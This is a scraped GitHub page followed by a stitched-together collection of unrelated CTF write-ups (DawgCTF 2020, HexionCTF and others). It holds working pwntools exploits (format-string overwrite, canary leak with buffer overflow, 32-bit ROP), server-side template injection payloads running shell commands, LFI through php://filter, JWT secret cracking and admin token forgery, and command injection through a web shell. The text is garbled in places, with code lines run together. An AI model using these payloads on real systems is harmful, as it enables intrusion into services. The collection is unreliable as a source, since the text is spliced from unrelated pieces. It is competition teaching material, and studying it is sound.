<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Hack Zone Tunisia 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwn2<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/Hack%20Zone%20Tunisia%202020/pwn/pwn2" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/Hack%20Zone%20Tunisia%202020/pwn/pwn2"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
This looks like some RSA with "small numbers" ;)
We can easily factorise n. Once we know n we can compute phi.
```n=960242069=151*6359219Phi = (p-1)(q-1) = 150*6359218 = 953882700e = 347ed = 1 mod 953882700```
Then, as we already know e we can compute d with a simple python loop.
```>>> i = 347>>> while (347*i%953882700 !=1):... i+=1...>>> i5497883```
We create a list c of the number as in the challenge description and decode every element using our RSA numbers.
```>>> c=[346046109,295161774,616062960,<SNIP>,770057231,770121847]>>> for elem in c:... print(chr((elem**5497883)%960242069))```
This was a bit long as a single process is involved but at the end we got the following output: xhBQCUIcbPf7IN88AT9FDFsqEOOjNM8uxsFrEJZRRifKB1E=|key=visionary
Vigenere cipher using the key visionary.
Once decrypted with the key we get the following: zJIOHIldUx7QF88MG9FMHxiMGAwNV8wckNjQWZATnxST1Q=
We decrypt the base64:
```$ echo -ne 'czJIOHIldUx7QF88MG9FMHxiMGAwNV8wckNjQWZATnxST1Q=' | base64 -ds2H8r%uL{@_<0oE0|b0`05_0rCcAf@N|ROT```
And then a ROT47 give us the flag: DawgCTF{Lo0k_@t_M3_1_d0_Cr4p7o}
|
# free wifi part 4
so after running a dirsearch I found the dir `/jwtlogin`
and from examining the pcap file I found the cookie```Set-Cookie: JWT 'secret'="dawgCTF?heckin#bamboozle"; Path=/```
so after playing around and analysing the pcap file I crafted the following jwt token`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MzEzMzcsInVzZXJuYW1lIjoidHJ1ZSIsImlhdCI6IjE1ODY2OTg2NDYiLCJleHAiOiIxNTg2Njk5NTE3IiwibmJmIjoiMTU4NjY5ODUxNyJ9.2C3UHzTJ21r1eNLyNIdXL14sNoXdexg2wMKjpuEd1X8`
the flag :P`DawgCTF{y0u_d0wn_w!t#_JWT?}` |
buy something and sell it for many times
earn enough money to buy flag
[read more](http://taqini.space/2020/04/13/DawgCTF-2020-Pwn-Writeup/#Tom-Nook-the-Capitalist-Racoon-200pt) |
```import socket
s = socket.socket()
port = 13372host = 'crypto.ctf.umbccd.io'
s.connect((host, port))
s.send(b'flg')flag=(s.recv(1024))#print(flag)s.send(b'enc:test')r=(s.recv(1024))#print(r)iv=r[0:16]#print(iv)s.send(b'dec:'+iv+flag)r=(s.recv(1024))print(r)s.close()``` |
flag is in https://wk.hexionteam.com/.well-known/security.txt which is a proposed standard invented by liveoverflow \
https://www.youtube.com/watch?v=f-FbcobQQb8 \
https://twitter.com/LiveOverflow/status/1199827781393272833 \
https://securitytxt.org/ \
Flag: hexCTF{th4nk_y0u_liv3_0v3rfl0w} |
### Exploit code:
```#!/usr/bin/env pythonfrom pwn import *
elf = context.binary = ELF('./ttt',checksec=False)
if args.REMOTE: s1 = ssh("ttt","challenges2.hexionteam.com",3004,"hexctf") proc = s1.process('./ttt')else: proc = process(elf.path)
"""============Attack plan:============Use format string bug in the following code:
puts("Please enter your name: "); scanf("%24s", name); getchar(); snprintf(message, 100, "Welcome %s!\n", name);
To change the value of the function the AI uses to decide its move:
logic_func DIFFICULTY = IMPOSSIBLE;
Basically we just change the function to a "return 0;".
Testing it out with gdb:
pwndbg> x/gx 0x603010 0x603010 <DIFFICULTY>: 0x0000000000401cd5 pwndbg> x/2i 0x0000000000401cd5 0x401cd5 <IMPOSSIBLE>: push rbp 0x401cd6 <IMPOSSIBLE+1>: mov rbp,rsp pwndbg> x/65i 0x401d91 0x401d91 <IMPOSSIBLE+188>: mov eax,0x0 0x401d96 <IMPOSSIBLE+193>: jmp 0x401d9c <IMPOSSIBLE+199> 0x401d98 <IMPOSSIBLE+195>: movsx eax,BYTE PTR [rbp-0xd] 0x401d9c <IMPOSSIBLE+199>: leave 0x401d9d <IMPOSSIBLE+200>: ret pwndbg> set *(long *)0x603010=0x401d91
And then playing against the AI, we find that if we make the following moves:
,---,---,---, | | | | |---+---+---| | | | | |---+---+---| | 3 | 2 | 1 | '---'---'---'
Its doesnt make a move agaisnt us.
So, we just need to change the value at 0x603010, from 0x401cd5 to 0x401d91.This is just a write of two bytes, which we can do easily with out format string bug.We just need to know our input starts at positional argument and to remember that8 bytes have already been printed by the "Welcome "."""proc.recvuntil('your name: \n')fmt = '%7561c%10$hnaaaa'+p64(0x603010)proc.sendline(fmt)
proc.recvuntil('Press ENTER to begin.\n')proc.sendline('') # send enterproc.sendline('a') # go left (wrap into last column)proc.sendline('s') # move down to middle row.proc.sendline('s') # move down to bottom row.proc.sendline(' ') # send space to fill square (bottom-left)proc.sendline('a') # move left (into middle column)proc.sendline(' ') # send space to fill square (bottom-middle)proc.sendline('a') # move left (into left column)proc.sendline(' ') # send space to fill square (bottom-left)proc.sendline('q') # finish game
lines_printed = proc.recvuntil('Do you want to play again?')print "\n".join(lines_printed.split('\n')[-4:])```
### Using it:
```$ ./exploit.py REMOTE[+] Connecting to challenges2.hexionteam.com on port 3004: Done[*] [email protected]:Distro Unknown OS: linuxArch: amd64Version: 5.0.0ASLR: Enabled[+] Starting rem*
hexCTF{h3y_th4ts_ch3at1ng}Do you want to play again?$``` |
Main call `conversation()`:```c__int64 conversation(){ unsigned int v0; // eax int v1; // eax char v3; // [rsp+Fh] [rbp-11h] char s; // [rsp+14h] [rbp-Ch] int v5; // [rsp+1Ch] [rbp-4h]
v0 = time(0LL); srand(v0); v1 = rand(); v5 = v1; saved_cookie = v1; puts("\nOh hello there, what's your name?"); fgets(&s, 8, _bss_start); printf("Hello, ", 8LL); printf(&s); puts("\nWould you like a cookie?"); gets(&v3;; return check_cookie(v5);}```
There is a format string vuln on first input and a buffer overflow on second input. We need to bypass cookie (canary) and jump into flag function.
Checksec:```[*] '/home/marco/Desktop/umbccd/cookie_monster/cookie_monster' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled```Since there is PIE we need to use the format string to leak the ret address (main+24) and use it to retrive flag function address.The canary is a random number wich is bad generated. So the intended solution is to generate the same number executing the program in the same moment.(code from https://github.com/toomanybananas/dawgctf-2020-writeups/blob/master/pwn/cookie_monster/cookie_sol.py):
```pythonimport ctypes
LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
#srand on the current time to get same seed as serverLIBC.srand(LIBC.time(0))cookie = p32(LIBC.rand())```
MY solution:
I noticed the random number changes every second. So if we open 2 connections with 2 different programs we obtain the same number. We can use the first program to leak the canary, pass to the second program and use the second program to leak the address and get the flag.
Exploit:```python#!/usr/bin/python3.8from pwn import *import subprocess
r = remote('ctf.umbccd.io', 4200)#r = process('./cookie_monster')
s = subprocess.Popen(['./leaker.py'], shell=True, stdout=subprocess.PIPE).stdout.read()s = int(s.decode().split('\n')[3], 16)
print(r.recvuntil('?').decode())r.sendline('%11$p')print(r.recvuntil('Hello, ').decode())mn = r.recv(16)main24 = int(mn, 16)flag = (main24-0x19a)
print('leaked cookie: ', hex(s))print('leaked main+24: ', hex(main24), ' current flag address: ', hex(flag))
print(r.recvuntil('?\n').decode())
payload = (('A'*13).encode())payload += p32(s)payload += (('A'*8).encode())payload += p64(flag)r.sendline(payload)print(r.recvall().decode())#r.interactive()```
leaker program:```python#!/usr/bin/python3.8from pwn import *
p = remote('ctf.umbccd.io', 4200)#p = process('./cookie_monster')
p.recvuntil('?')p.sendline('%9$lx')p.recvuntil('Hello, ')cookie = int(p.recv(8), 16)print(hex(cookie), "\n")p.close()```
# FLAG`DawgCTF{oM_n0m_NOm_I_li3k_c0oOoki3s}` |
Seems like a pretty easy challenge as the challenge description says, “Sanity check. crypto.ctf.umbccd.io 13370”. It also gives us a python file: client0.py. On opening the python file we see that the server has 2 methods, and that the flg method will print the flag.
```Welcome to my sanity check. You'll find this to be fairly easy. The oracle is found at umbccd.io:13370, and your methods are: flg - returns the flag tst - returns the message after the : in "tst:..."```
Now all we need to do is netcat to crypto.ctf.umbccd.io 13370 & type in ‘flg’ to get our flag! There you go!
Flag: DawgCTF{H3ll0_W0rld!}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
DIY ascii shellcode is so interesting...
1. ret2trash by bof2. call sys_execve("/bin/sh") to getshell
[read more](http://taqini.space/2020/04/13/DawgCTF-2020-Pwn-trASCII-Writeup/) |
Main:
```cint __cdecl main(int argc, const char **argv, const char **envp){ int v3; // ST10_4 int v5; // [rsp+14h] [rbp-1Ch] char s1; // [rsp+1Ah] [rbp-16h] char v7; // [rsp+1Bh] [rbp-15h] char v8; // [rsp+1Ch] [rbp-14h] char v9; // [rsp+1Dh] [rbp-13h] char v10; // [rsp+1Eh] [rbp-12h] char v11; // [rsp+1Fh] [rbp-11h] char v12; // [rsp+20h] [rbp-10h] char v13; // [rsp+21h] [rbp-Fh] char v14; // [rsp+22h] [rbp-Eh] char v15; // [rsp+23h] [rbp-Dh] char v16; // [rsp+24h] [rbp-Ch] char v17; // [rsp+25h] [rbp-Bh] char v18; // [rsp+26h] [rbp-Ah] char v19; // [rsp+27h] [rbp-9h] unsigned __int64 v20; // [rsp+28h] [rbp-8h]
v20 = __readfsqword(0x28u); s1 = 'p'; v7 = 'l'; v8 = 'e'; v9 = 'a'; v10 = 's'; v11 = 'e'; v12 = '\0'; v13 = 'p'; v14 = 'r'; v15 = 'e'; v16 = 't'; v17 = 't'; v18 = 'y'; v19 = 0; if ( argc == 1 ) { puts("Ask Nicely"); } else if ( !strncmp(&s1, argv[1], 7uLL) ) { puts("Ask Nicer!"); } else if ( argc == 3 ) { v3 = strncmp(&s1, argv[2], 7uLL); v5 = strncmp(&v13, argv[1], 7uLL); if ( !v3 && !v5 ) flag(); } return 0;}```
Flag function:```cint flag(){ putchar('D'); putchar('a'); putchar('w'); putchar('g'); putchar('C'); putchar('T'); putchar('F'); putchar('{'); putchar('+'); putchar('h'); putchar('@'); putchar('n'); putchar('K'); putchar('_'); putchar('Y'); putchar('0'); putchar('U'); putchar('}'); return putchar('\n');}```# FLAG`DawgCTF{+h@nK_Y0U}` |
# bof on the top
this one was just a classic bufferovflow
we will start by examining the binary `checksec ./bof`

nothing unique no protection no ASLR
so I just got a cyclic pattern and located the overflowdone :D
exploit code ```from pwn import *
p = remote("ctf.umbccd.io", 4000)#p = process("./bof")
win = p32(0x08049182)
payload = ("A"*62).encode() + win + p32(0xdeadbeef) + p32(1200) + p32(366)
input("attach gdb")p.recvuntil("name?")p.sendline(payload)p.recvuntil("singing?")p.sendline()
data = p.recvline()print(data.decode())data = p.recvline()print(data.decode())p.interactive()``` |
The source code is given:```c#include "stdio.h"#include "string.h"#include "stdlib.h"
// gcc -m32 -fno-stack-protector -no-pie bof.c -o bof
void audition(int time, int room_num){ char* flag = "/bin/cat flag.txt"; if(time == 1200 && room_num == 366){ system(flag); }}
void get_audition_info(){ char name[50]; char song[50]; printf("What's your name?\n"); gets(name); printf("What song will you be singing?\n"); gets(song);}
void welcome(){ printf("Welcome to East High!\n"); printf("We're the Wildcats and getting ready for our spring musical\n"); printf("We're now accepting signups for auditions!\n");}
int main(){ welcome(); get_audition_info(); return 0;}```
The two input are no bounded -> buffer overflow. We can rop into `audition()` function injecting the 2 parameters in the stack since is 32 bit binary
Exploit:```pythonfrom pwn import *
e = ELF('./bof')
payload = (('A'*112).encode())payload += p32(e.symbols['audition'])payload += (("B"*4).encode())payload += p32(0x4B0)payload += p32(0x16E)
p = remote('ctf.umbccd.io', 4000)#p = process('./bof')print(p.recvuntil('?\n').decode())p.sendline("A".encode())print(p.recvuntil('?\n').decode())p.sendline(payload)p.interactive()```
# FLAG`DawgCTF{wh@t_teAm?}` |
This is a reversing challenge and the only hint we get is ask nicely! So let’s run the binary file, on running it we get an output ask nicely, let’s try to use some parameters now: First we try ./asknicely please, and then ./asknicely pretty please: which gives us the flag :D
Flag: DawgCTF{+h@nK_YOU}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
# Tracking
## Description
> What's that pixel tracking?> > https://clearedge.ctf.umbccd.io/
## Solution
Looking at the Explorer, I see that there is an alert activated on click on one pixel. I click on the pixel to display the alert.

We could also just execute the jasascript, but clicking on one pixel it more fun!
Flag: `DawgCTF{ClearEdge_uni}` |
# Benford's Law Firm, LLC
## Description
> Someone's faking their finances. Can you figure out which file has fake financial data?
A zip is joined.
## Solution
We unzip the file and this gives us hundreds of CSV files, with each a different flag as their name. They look like this

I find that there is no mathematical relations between the numbers. So I try to see if the title might be a hint, and yes, Benford's Law is a statistics law (https://en.wikipedia.org/wiki/Benford%27s_law). It says that the first digit of a series of integers follows Benford's Law, and for example `1`is more common than `2`. And this can be used to detect falsified data, which will not follow the law.
So my script is as follows. For each CSV file, I get all of the numbers, and extract their first digits. I then calculate the frequency of each number. I then compare it to the fraquency expected by Benford's law using chi square method. The falsified data is the one that is farthest from the law.
```pythonimport numpy as npfrom scipy import statsfrom os import listdir
files = listdir('/path/to/csvs')
result = {}
for file in files:
filename = '/path/to/csvs' + file
data =[] with open(filename, 'r') as f: for l in f: try: data.append(int("".join(filter(str.isdigit, l.split(',')[1]))[0])) # get the first digit of each line except Exception: continue
found = [data.count(c)/len(data) for c in range(1, 10)] # found frequency in the file
expected = [0.301030, 0.176091, 0.124939, 0.096910, 0.079181, 0.066947, 0.057992, 0.051153, 0.045757] # Expected frequency by Benford's law
chisq, p= stats.chisquare(found, f_exp=expected) # Calculate statistical difference
result[filename] = chisq
for k in sorted(result, key=result.get): print(k, result[k]) # Print filename with their difference from the law, sorted so the one in bottom is the falsified```
The last line printed is `DawgCTF{L3g@lly_D1s7ribu73d_St@t1st1c5_641}.csv 0.6609641030990201`. This one has a chi square twice as big the other files.
Flag: `DawgCTF{L3g@lly_D1s7ribu73d_St@t1st1c5_641}` |
<h1 align="center">Web Exploitation</h1>
<h3>Hot Access 70 points</h3>
Access to all the latest modules, hot off the press! What can you access?
Connect here: http://jh2i.com:50016
```shell
http://jh2i.com:50016/?m=modules/../.htaccess
<Directory /var/www/html>
Options Indexes FollowSymLinks MultiViews AllowOverride All Order allow,deny allow from all </Directory>
<Directory /var/www/html/sshh_dont_tell_i_hid_the_flag_here> AllowOverride All </Directory>
http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txtLLS{htaccess_can_control_what_you_access}
Flag: LLS{htaccess_can_control_what_you_access}```
<h3>PHPJuggler 80 points</h3>
PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling!
Connect here: http://jh2i.com:50030.
``` shellPhp Type Juggling strcmp:
submit POST requests with flag[]=flagWarning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6You got it! That's the correct flag!LLS{php_dropped_the_ball_again}
Flag: LLS{php_dropped_the_ball_again}```
<h3>Magician 80 points</h3>
Show me a hat trick!
Connect here: http://jh2i.com:50000
``` shellMagic Hash as whihehat security or 247CTF!!!:
hash ==> 0e908377363673038390833004129775password ==> f789bbc328a3d1a3e4UPoL
Flag: LLS{magic_hashes_make_for_a_good_show}```
<h3>GLHF 90 points</h3>
LMFAO! FLAG PLZ, THX!
Connect here: http://jh2i.com:50014
``` shellLocal file inclusion: LFI:
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index
http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG
<html> <head> <title> PHPLFIXYZ </title> </head> <body>
<h1> FLAG???? </h1>
<h1> WTF, PLZ??? </h1>
</body></html>
Flag: LLS{lmfao_php_filters_ftw}```
<h3>MASK 90 points</h3>
Take off your mask.
Connect here: http://jh2i.com:50023.
``` shellServer Side Template Injection:
test ==> {{7*7}} response 49
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}```
``` shell{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
Flag: LLS{server_side_template_injection_unmasked}```
<h3>JaWT 90 points</h3>
Check the admin's scratchpad!
Connect here: http://jh2i.com:50019/
``` shellChallenge as PicoCTF and use crackjwt.py
FOR JOHNpython crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dicCracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc1648it [00:00, 6560.78it/s]('Found secret key:', 'fuckit')
FOR ADMINeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0
Change value of cookie jwt
Hello admin!
Here is your JaWT scratchpad!
LLS{jawt_was_just_what_you_thought}
Flag: LLS{jawt_was_just_what_you_thought}```
<h3>10 Character Web Shell 100 points</h3>
Only 10 char--
Connect here: http://jh2i.com:50001.
``` shell
http://jh2i.com:50001/?c=cat%20flag*```
``` shellFlag: LLS{you_really_can_see_in_the_dark}```
<h3>Dairy Products 100 points</h3>
There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product.
Connect here: http://142.93.3.19:50008
```shellJust use wget because gitdumper.sh don't download repo.
wget -r --no-parent http://142.93.3.19:50008/.git/
git statusgit --no-pager log -p | grep LLS{LLS{you_gitm_gotm_good_partner}
Flag: LLS{you_gitm_gotm_good_partner}```
<h3>GET Encoded 125 points</h3>
I don't GET this%21 Do you%3F
Connect here: http://jh2i.com:50013
```shellrobots.txt with /?debug```
```shellhttp://jh2i.com:50013/?%73ystem=ls
flag_that_you_could_never_guess.phpindex.phprobots.txt
Machines hunt for more than humans do.
http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php
Machines hunt for more than humans do.
Machines hunt for more than humans do.
Flag: LLS{i_gotcha_url_encoding}```
Return to the main menu
Return to the main menu |
# Twice as secret, Right?
## Description
> Evelyn was snooping on some parking lot RF chatter when she noticed an interesting signal on a weird frequency. The provided link has a sample of the intercepted signal after it was cleaned up:>> https://cdn.discordapp.com/attachments/676467674783547432/695740859316174848/mystery_signal.wav>> Note: This flag does not follow the normal format
## Solution
Listening to the file we recognize morse code. So we use a Morse code decoder from sound file: https://morsecode.world/international/decoder/audio-decoder-adaptive.html
From there (with a little extrapolation from our part) we get the following string:
